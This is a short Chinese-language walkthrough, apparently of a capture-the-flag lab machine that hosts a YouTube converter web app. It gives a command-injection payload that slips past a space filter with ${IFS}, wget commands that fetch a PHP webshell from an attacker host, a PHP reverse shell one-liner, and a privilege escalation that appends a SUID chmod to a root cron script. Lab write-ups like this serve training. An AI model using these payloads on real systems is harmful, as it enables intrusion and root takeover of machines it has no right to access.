扫描端口
22,80端口
这是一个Youtube视频在线转换工具在
测试框中粘贴随机的 YouTube URL 后,我们点击转换按钮。单击拦截并将其打开。
这里我们得到一个Github链接。在检查 Github 链接时,我们发现了有关此 Web 应用程序可以接受哪些命令句柄的选项。
执行一下发现它过滤空格
可以用用其他方式绕过,比如%0a、%0b、%09、${IFS}
等
yt_url=1;wget${IFS}192.168.44.143:8000/shell3.php;
这边咱们用weevely,学习个新姿势
python -m SimpleHTTPServer 8080
yt_url=1;wget${IFS}http://192.168.1.112:8080/shell.php;
或者直接上传一个.sh文件后,利用命令执行直接执行文件,反弹shell也可以
用上传shell.php
同样的方法将pspy64
传到靶机上,但是weevely
的shell无法运行成功pspy64
,无奈使用php弹了一个shell到攻击机上,发现可以运行成功
php -r '$sock=fsockopen("192.168.56.177",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
可以看到root权限执行了clean.sh
直接写入反弹shell,kali监听,等待一会就提权了
echo "chmod u+s /usr/bin/find" >> clean.sh 过一段时间执行
然后使用find
命令的-exec
选项进行提权
find . -exec /bin/bash -p \;